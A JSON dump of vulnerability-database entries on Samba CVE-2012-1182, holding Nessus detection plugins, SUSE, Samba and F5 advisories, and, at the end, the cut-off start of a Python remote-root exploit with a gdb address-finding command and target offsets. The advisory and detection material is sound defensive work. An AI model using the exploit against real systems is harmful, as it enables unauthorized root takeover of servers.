PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58671);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"FreeBSD : samba -- 'root' credential remote code execution (baf37cd2-8351-11e1-894e-00215c6a37bb)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba development team reports :\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the 'root' user\nfrom an anonymous connection.\n\nAs this does not require an authenticated connection it is the most\nserious vulnerability possible in a program, and users and vendors are\nencouraged to patch their Samba installations immediately.\"\n );\n # https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42d55cea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba34\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba35\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba36\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba34>3.4.*<3.4.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba35>3.5.*<3.5.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba36>3.6.*<3.6.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:41:30", "description": "Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-19T00:00:00", "type": "nessus", "title": "Fedora 17 : samba-3.6.4-82.fc17.1 (2012-5793)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1182", "CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-5793.NASL", "href": "https://www.tenable.com/plugins/nessus/58789", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5793.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58789);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-5793\");\n\n script_name(english:\"Fedora 17 : samba-3.6.4-82.fc17.1 (2012-5793)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=811392\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/078726.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f21e5094\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"samba-3.6.4-82.fc17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:41:32", "description": "Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "Fedora 16 : samba-3.6.4-82.fc16 (2012-5843)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1182", "CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-5843.NASL", "href": "https://www.tenable.com/plugins/nessus/58755", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5843.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58755);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"FEDORA\", value:\"2012-5843\");\n\n script_name(english:\"Fedora 16 : samba-3.6.4-82.fc16 (2012-5843)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=811392\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/078258.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78503d7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba-3.6.4-82.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:46", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "cvss3": {}, "published": "2012-04-14T14:08:19", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T14:08:19", "id": "SUSE-SU-2012:0501-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00010.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:22", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bug has been fixed:\n\n * mount.cifs: Properly update mtab during remount;\n (bnc#747906).\n", "cvss3": {}, "published": "2012-04-14T14:08:17", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T14:08:17", "id": "SUSE-SU-2012:0504-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00009.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "description": "Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\n\n", "cvss3": {}, "published": "2012-04-16T16:08:12", "type": "suse", "title": "update for samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-16T16:08:12", "id": "OPENSUSE-SU-2012:0508-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:14", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "cvss3": {}, "published": "2012-04-14T10:08:19", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T10:08:19", "id": "SUSE-SU-2012:0501-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00007.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:06", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bugs have been fixed:\n\n * Samba printer name marshalling problems (bnc#722663)\n * mount.cifs: properly update mtab during remount\n (bnc#747906)\n * s3: compile IDL files in autogen, some configure\n tests need this.\n * Fix incorrect types in the full audit VFS module. Add\n null terminators to audit log enums (bnc#742885)\n * Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631); (bnc#732572).\n", "cvss3": {}, "published": "2012-04-14T10:08:18", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T10:08:18", "id": "SUSE-SU-2012:0500-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00006.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:03:49", "description": "- Add the ldapsmb sources as else patches against them have\n no chance to apply.\n\n - Samba pre-3.6.4 are affected by a vulnerability that\n allows remote code exe- cution as the "root" user; PIDL\n based autogenerated code allows overwriting beyond of\n allocated array; CVE-2012-1182; (bso#8815); (bnc#752797).\n\n - s3-winbindd: Only use SamLogonEx when we can get\n unencrypted session keys; (bso#8599).\n - Correctly handle DENY ACEs when privileges apply;\n (bso#8797).\n\n - s3:smb2_server: fix a logic error, we should sign non\n guest sessions; (bso8749).\n - Allow vfs_aio_pthread to build as a static module;\n (bso#8723).\n - s3:dbwrap_ctdb: return the number of records in\n db_ctdb_traverse() for persistent dbs; (#bso8527).\n - s3: segfault in dom_sid_compare(bso#8567).\n - Honor SeTakeOwnershiPrivilege when client asks for\n SEC_STD_WRITE_OWNER; (bso#8768).\n - s3-winbindd: Close netlogon connection if the status\n returned by the NetrSamLogonEx call is timeout in the\n pam_auth_crap path; (bso#8771).\n - s3-winbindd: set the can_do_validation6 also for trusted\n domain; (bso#8599).\n - Fix problem when calculating the share security mask,\n take priviliges into account for the connecting user;\n (bso#8784).\n\n - Fix crash in dcerpc_lsa_lookup_sids_noalloc() with over\n 1000 groups; (bso#8807); (bnc#751454).\n\n - Remove obsoleted Authors lines from spec file for\n post-11.2 systems.\n\n - Make ldapsmb build with Fedora 15 and 16; (bso#8783).\n - BuildRequire libuuid-devel for post-11.0 and other\n systems.\n - Define missing python macros for non SUSE systems.\n - PreReq to fillup_prereq and insserv_prereq only on SUSE\n systems.\n - Always use cifstab instead of smbfstab on non SUSE\n systems.\n\n - Ensure AndX offsets are increasing strictly monotonically\n in pre-3.4 versions; CVE-2012-0870; (bnc#747934).\n\n - Add SERVERID_UNIQUE_ID_NOT_TO_VERIFY; (bso#8760);\n (bnc#741854).\n\n - s3-printing: fix crash in printer_list_set_printer();\n (bso#8762); (bnc#746825).\n\n", "cvss3": {}, "published": "2012-04-16T15:08:16", "type": "suse", "title": "update for samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182", "CVE-2012-0870"], "modified": "2012-04-16T15:08:16", "id": "OPENSUSE-SU-2012:0507-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00011.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "samba": [{"lastseen": "2021-10-13T09:49:46", "description": "## Description\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n\nThe code generator for Samba's remote procedure call (RPC) code\ncontained an error which caused it to generate code containing a\nsecurity flaw. This generated code is used in the parts of Samba that\ncontrol marshalling and unmarshalling of RPC calls over the network.\n\nThe flaw caused checks on the variable containing the length of an\nallocated array to be done independently from the checks on the\nvariable used to allocate the memory for that array. As both these\nvariables are controlled by the connecting client it makes it possible\nfor a specially crafted RPC call to cause the server to execute\narbitrary code.\n\nAs this does not require an authenticated connection it is the most\nserious vulnerability possible in a program, and users and vendors are\nencouraged to patch their Samba installations immediately.\n## Patch Availability\n\nPatches addressing this issue have been posted to:\n\n http://www.samba.org/samba/security/\n\nAdditionally, Samba 3.6.4, Samba 3.5.14 and 3.4.16 have been issued as\nsecurity releases to correct the defect. Patches against older Samba\nversions are available at:\n\n http://samba.org/samba/patches/\n\nSamba administrators running affected versions are advised to upgrade\nto 3.6.4, 3.5.14, or 3.4.16 or apply these patches as soon as\npossible.\n\nDue to the seriousness of this vulnerability, patches have been\nreleased for all Samba versions currently out of support and\nmaintenance from 3.0.37 onwards.\n\nPatches for the 3.6 series also apply to Samba4 alpha18 and can be used to\nmake a pure security release on top of it.\n## Workaround\n\nSamba contains a \"hosts allow\" parameter that can be used inside\nsmb.conf to restrict the clients allowed to connect to the server to a\ntrusted list. This can be used to help mitigate the problem caused by\nthis bug but it is by no means a real fix, as client addresses can be\neasily faked.\n## Credits\n\nThis vulnerability and proof of concept code was provided by Brian\nGorenc as well as an anonymous researcher working with HP's Zero Day\nInitiative program. The Samba Team would like to thank them for\nreporting the problem and their cooperation in this matter.\n\nPatches were provided by Stefan Metzmacher of the Samba team, based on\ninitial work by Volker Lendecke.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "samba", "title": "\"root\" credential remote code execution.", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "SAMBA:CVE-2012-1182", "href": "https://www.samba.org/samba/security/CVE-2012-1182.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:13", "description": "\nF5 Product Development has evaluated the currently-supported releases for potential vulnerability. To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP AAM| None| 11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nFirePass| None| 6.x \n7.x| None \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 6.x \n5.x| None \nNone \nNone\n\nNone \n\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "cvss3": {}, "published": "2012-07-10T20:45:00", "type": "f5", "title": "Samba vulnerability CVE-2012-1182", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2016-07-01T23:45:00", "id": "F5:K13719", "href": "https://support.f5.com/csp/article/K13719", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "cvss3": {}, "published": "2012-07-10T00:00:00", "type": "f5", "title": "SOL13719 - Samba vulnerability CVE-2012-1182", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2016-07-01T00:00:00", "id": "SOL13719", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/700/sol13719.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:26", "description": "", "cvss3": {}, "published": "2012-09-25T00:00:00", "type": "packetstorm", "title": "Samba 3.x Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-09-25T00:00:00", "id": "PACKETSTORM:116843", "href": "https://packetstormsecurity.com/files/116843/Samba-3.x-Remote-Root.html", "sourceData": "`#!/usr/bin/python \n# \n# finding targets 4 31337z: \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell \n# found by eax samba 0day godz (loljk) \n \n \nfrom binascii import hexlify, unhexlify \nimport socket \nimport threading \nimport SocketServer \nimport sys \nimport os \nimport time \nimport struct \n \ntargets = [ \n{ \n\"name\" : \"samba_3.6.3-debian6\", \n\"chunk_offset\" : 0x9148, \n\"system_libc_offset\" : 0xb6d003c0 \n}, \n{ \n\"name\" : \"samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)\", \n\"chunk_offset\" : 4560, \n\"system_libc_offset\" : 0xb20 \n}, \n{ \n\"name\" : \"target_finder (hardcode correct system addr)\", \n\"chunk_offset\" : 0, \n\"system_libc_offset\" : 0xb6d1a3c0, \n\"finder\": True \n} \n] \n \ndo_brute = True \nrs = 1024 \nFILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) \n \ndef dump(src, length=32): \nresult=[] \nfor i in xrange(0, len(src), length): \ns = src[i:i+length] \nhexa = ' '.join([\"%02x\"%ord(x) for x in s]) \nprintable = s.translate(FILTER) \nresult.append(\"%04x %-*s %s\\n\" % (i, length*3, hexa, 